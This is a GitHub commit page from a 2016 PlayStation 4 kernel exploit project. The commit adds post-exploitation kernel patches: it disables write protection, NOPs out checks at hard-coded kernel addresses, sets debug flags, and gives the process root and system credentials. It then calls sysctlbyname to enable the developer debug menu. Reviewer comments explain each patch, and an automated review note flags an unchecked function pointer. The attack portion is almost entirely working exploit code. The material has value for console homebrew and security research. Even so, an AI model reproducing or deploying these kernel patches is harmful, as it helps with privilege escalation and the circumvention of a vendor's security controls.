
Enable dev menu

Thanks, flatz :)
1 parent c8f27db commit 0028afaf0ef9b2581d47ec4d32ebb4c75db9d576 @CTurt CTurt committed Apr 27, 2016
Showing with 22 additions and 9 deletions.
  1. +22 −9 source/main.c
@@ -32,12 +32,17 @@ void payload(struct knote *kn) {
// Disable write protection
uint64_t cr0 = readCr0();
writeCr0(cr0 & ~X86_CR0_WP);
-
- // Patch functions here if required
-
+
+ // sysctl_machdep_rcmgr_debug_menu and sysctl_machdep_rcmgr_store_moe
+ *(uint16_t *)0xFFFFFFFF82607C46 = 0x9090;
@balika011
balika011 May 1, 2016 edited

It's just a bypass for word_FFFFFFFF833242F6 & 4 in FFFFFFFF826073B0

+ *(uint16_t *)0xFFFFFFFF82607826 = 0x9090;
@balika011
balika011 May 1, 2016 edited

It's just a bypass for word_FFFFFFFF833242F6 & 0x10 in FFFFFFFF826077D0

+
+ *(char *)0xFFFFFFFF8332431A = 1;
@balika011
balika011 May 1, 2016

bIsAllowDebugSoftWagnerClock

+ *(char *)0xFFFFFFFF83324338 = 1;
@balika011
balika011 May 1, 2016

bIsAllowAdClock, bIsStoreMode, also used in FFFFFFFF826077D0

+
// Restore write protection
writeCr0(cr0);
-
+
// Resolve creds
cred = td->td_proc->p_ucred;
@@ -48,7 +53,7 @@ void payload(struct knote *kn) {
cred->cr_groups[0] = 0;
void *td_ucred = *(void **)(((char *)td) + 304); // p_ucred == td_ucred
-
+
// sceSblACMgrIsSystemUcred
uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96);
*sonyCred = 0xffffffffffffffff;
@@ -101,11 +106,8 @@ void *exploitThread(void *none) {
uint64_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);
uint8_t *mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
-
- // Ensure end of mapping is unmapped
munmap(mapping + mappingSize, PAGE_SIZE);
- // buffer + copySize points to unmapped memory
uint8_t *buffer = mapping + mappingSize - copySize;
int64_t count = (0x100000000 + bufferSize) / 4;
@@ -246,7 +248,18 @@ int _main(void) {
printfsocket("[+] Kernel patch success!\n");
- // Do any post-exploit stuff here
+ // Enable debug menu
+ int (*sysctlbyname)(const char *name, void *oldp, size_t *oldlenp, const void *newp, size_t newlen) = NULL;
+ RESOLVE(libKernelHandle, sysctlbyname);
+
+ uint32_t enable;
+ size_t size;
+
+ enable = 1;
+ size = sizeof(enable);
+
+ sysctlbyname("machdep.rcmgr_utoken_store_mode", NULL, NULL, &enable, size);
+ sysctlbyname("machdep.rcmgr_debug_menu", NULL, NULL, &enable, size);
#ifdef DEBUG_SOCKET
munmap(dump, PAGE_SIZE);
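Review bot: The `sysctlbyname` pointer produced by `RESOLVE(libKernelHandle, sysctlbyname)` is called unconditionally two lines later and both return values are discarded, so a failed symbol lookup dereferences a NULL function pointer and a rejected sysctl is silently treated as success even though `printfsocket("[+] Kernel patch success!\n")` has already been reported. Guard the pointer and route failure through the existing logging, e.g. `if (sysctlbyname == NULL || sysctlbyname("machdep.rcmgr_utoken_store_mode", NULL, NULL, &enable, size) != 0 || sysctlbyname("machdep.rcmgr_debug_menu", NULL, NULL, &enable, size) != 0) printfsocket("[-] Failed to enable debug menu\n");`. The two declarations and their later assignments could be folded into `uint32_t enable = 1; size_t size = sizeof(enable);` so neither variable is ever uninitialized. `_main` begins before this hunk and continues past it.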

2 comments on commit 0028afa

@chronoss09

Good work, thanks ;)

@Anonymodmous

Very good work
